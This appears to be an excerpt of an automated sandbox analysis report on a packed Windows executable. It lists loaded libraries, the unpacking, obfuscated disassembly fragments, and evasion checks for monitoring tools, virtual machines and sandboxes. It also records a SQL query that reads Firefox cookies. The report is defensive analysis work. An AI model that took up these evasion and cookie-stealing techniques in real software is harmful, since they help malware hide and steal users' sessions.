              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;q
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1785856 > 1048576
              Source: file.exeStatic PE information: Raw size of yktwzmco is bigger than: 0x100000 < 0x19a200
              Source: Binary string: .PdBo source: file.exe, 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yktwzmco:EW;jxtdziyw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yktwzmco:EW;jxtdziyw:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009068F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_009068F0
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1bc6e1 should be: 0x1c2d74
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: yktwzmco
              Source: file.exeStatic PE information: section name: jxtdziyw
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D0F8D3 push 2D64E4A3h; mov dword ptr [esp], edx1_2_00D0F912
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DC08D7 push edx; mov dword ptr [esp], 6BEB8DD9h1_2_00DC08F2
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D520C8 push esi; mov dword ptr [esp], edi1_2_00D52104
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D7E0F2 push ecx; mov dword ptr [esp], 32487D7Ah1_2_00D7E9C5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push 538DC047h; mov dword ptr [esp], ecx1_2_00CA2144
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push esi; mov dword ptr [esp], ebp1_2_00CA21AE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push ebx; mov dword ptr [esp], edx1_2_00CA21D6
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push eax; mov dword ptr [esp], ecx1_2_00CA231D
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push ebx; mov dword ptr [esp], edi1_2_00CA233A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push ebp; mov dword ptr [esp], ebx1_2_00CA238C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push 00662B76h; mov dword ptr [esp], ebp1_2_00CA241E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push ecx; mov dword ptr [esp], edx1_2_00CA249A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push 2D852466h; mov dword ptr [esp], eax1_2_00CA24B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push edi; mov dword ptr [esp], ebx1_2_00CA2622
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push edx; mov dword ptr [esp], esi1_2_00CA2628
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push edx; mov dword ptr [esp], eax1_2_00CA266B
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push ebx; mov dword ptr [esp], edx1_2_00CA26CE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push ecx; mov dword ptr [esp], edx1_2_00CA26D7
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push ebx; mov dword ptr [esp], esi1_2_00CA270B
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push ecx; mov dword ptr [esp], eax1_2_00CA272E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push ecx; mov dword ptr [esp], 5F092804h1_2_00CA275E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push 5BD84524h; mov dword ptr [esp], eax1_2_00CA27A1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push 5F86DBD6h; mov dword ptr [esp], edi1_2_00CA27AC
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push 37E10105h; mov dword ptr [esp], ebp1_2_00CA2823
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push edi; mov dword ptr [esp], 67B79601h1_2_00CA2844
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push 03BA3DEAh; mov dword ptr [esp], edx1_2_00CA28D1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push 46E5E50Ch; mov dword ptr [esp], ebx1_2_00CA29D2
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push edi; mov dword ptr [esp], ecx1_2_00CA29FC
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push edx; mov dword ptr [esp], ecx1_2_00CA2A18
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push edx; mov dword ptr [esp], ecx1_2_00CA2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CA20FA push 1913A9D1h; mov dword ptr [esp], edi1_2_00CA2AE4
              Source: file.exeStatic PE information: section name: yktwzmco entropy: 7.954359902846811

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009068F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_009068F0

              Malware Analysis System Evasion

              barindex
              Contain functionality to detect virtual machines
              Source: C:\Users\user\Desktop\file.exeCode function: MSHN6QKQEMU MSHN6QKQEMU 1_2_008E2A90
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-27372
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F971 second address: B2F975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F975 second address: B2F990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18347h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F990 second address: B2F9C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FA1D8D64E56h 0x00000009 jmp 00007FA1D8D64E68h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FA1D8D64E5Ah 0x00000018 pushad 0x00000019 jbe 00007FA1D8D64E56h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC160 second address: CAC183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18349h 0x00000007 jnp 00007FA1D8D18336h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC183 second address: CAC194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1D8D64E5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA36DD second address: CA36EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FA1D8D18336h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB5BC second address: CAB604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA1D8D64E56h 0x00000009 jmp 00007FA1D8D64E66h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a jmp 00007FA1D8D64E68h 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB946 second address: CAB94C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB94C second address: CAB956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB956 second address: CAB960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA1D8D18336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB960 second address: CAB964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB964 second address: CAB96A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB96A second address: CAB9A7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1D8D64E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1D8D64E68h 0x00000011 push edx 0x00000012 jmp 00007FA1D8D64E65h 0x00000017 pop edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB9A7 second address: CAB9B2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FA1D8D18336h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF5F1 second address: CAF5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF5F5 second address: CAF5FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF5FB second address: B2F971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007FA1D8D64E56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 1921B9BAh 0x00000015 mov si, ax 0x00000018 adc esi, 145691F9h 0x0000001e push dword ptr [ebp+122D1005h] 0x00000024 and ecx, 254D3B9Ah 0x0000002a mov dx, D401h 0x0000002e call dword ptr [ebp+122D29A8h] 0x00000034 pushad 0x00000035 pushad 0x00000036 and ah, 0000004Ch 0x00000039 sub dx, 9A99h 0x0000003e popad 0x0000003f xor eax, eax 0x00000041 sub dword ptr [ebp+122D1B48h], ebx 0x00000047 mov edx, dword ptr [esp+28h] 0x0000004b mov dword ptr [ebp+122D1B48h], edx 0x00000051 mov dword ptr [ebp+122D38A5h], eax 0x00000057 stc 0x00000058 mov esi, 0000003Ch 0x0000005d add dword ptr [ebp+122D1B48h], edx 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 mov dword ptr [ebp+122D278Ch], edx 0x0000006d lodsw 0x0000006f pushad 0x00000070 mov esi, dword ptr [ebp+122D3619h] 0x00000076 popad 0x00000077 mov dword ptr [ebp+122D192Ch], edi 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 jmp 00007FA1D8D64E63h 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a or dword ptr [ebp+122D1B48h], edx 0x00000090 nop 0x00000091 push eax 0x00000092 push edx 0x00000093 push eax 0x00000094 push edx 0x00000095 push eax 0x00000096 push edx 0x00000097 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF6B0 second address: CAF6E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1D8D18348h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FA1D8D1833Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF6E1 second address: CAF6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF6E6 second address: CAF6FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D1833Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF88A second address: CAF898 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1D8D64E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF898 second address: CAF90F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA1D8D18336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 0B333001h 0x00000012 mov esi, ecx 0x00000014 push 00000003h 0x00000016 jp 00007FA1D8D18342h 0x0000001c jng 00007FA1D8D1833Ch 0x00000022 add ecx, 58E52C52h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FA1D8D18338h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 pushad 0x00000045 mov dx, ax 0x00000048 mov dword ptr [ebp+122D2707h], esi 0x0000004e popad 0x0000004f jmp 00007FA1D8D1833Dh 0x00000054 push 00000003h 0x00000056 jc 00007FA1D8D18338h 0x0000005c mov ch, 05h 0x0000005e push 4032252Dh 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF90F second address: CAF913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF913 second address: CAF917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF917 second address: CAF91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF91D second address: CAF927 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA1D8D1833Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF927 second address: CAF94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 7FCDDAD3h 0x0000000d cmc 0x0000000e movsx edx, cx 0x00000011 lea ebx, dword ptr [ebp+1245353Ch] 0x00000017 mov dword ptr [ebp+122D191Dh], esi 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF94A second address: CAF950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF950 second address: CAF955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF955 second address: CAF95A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFA7F second address: CAFA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFA83 second address: CAFA87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFA87 second address: CAFA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFA8D second address: CAFAD1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA1D8D1833Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007FA1D8D18344h 0x00000012 jmp 00007FA1D8D18342h 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 pop eax 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFAD1 second address: CAFB0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1D8D64E60h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e xor dword ptr [ebp+122D192Ch], ebx 0x00000014 lea ebx, dword ptr [ebp+12453547h] 0x0000001a movzx ecx, si 0x0000001d push eax 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FA1D8D64E5Eh 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFB0B second address: CAFB0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1432 second address: CC1436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE341 second address: CCE345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE345 second address: CCE36A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E69h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE36A second address: CCE36E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE36E second address: CCE379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE6DD second address: CCE6E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE6E1 second address: CCE6E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE6E7 second address: CCE6F1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA1D8D1833Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE9BE second address: CCE9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA1D8D64E56h 0x0000000a jmp 00007FA1D8D64E5Dh 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE9D6 second address: CCE9E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA1D8D18336h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE9E2 second address: CCE9E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF067 second address: CCF07D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FA1D8D18340h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF832 second address: CCF836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
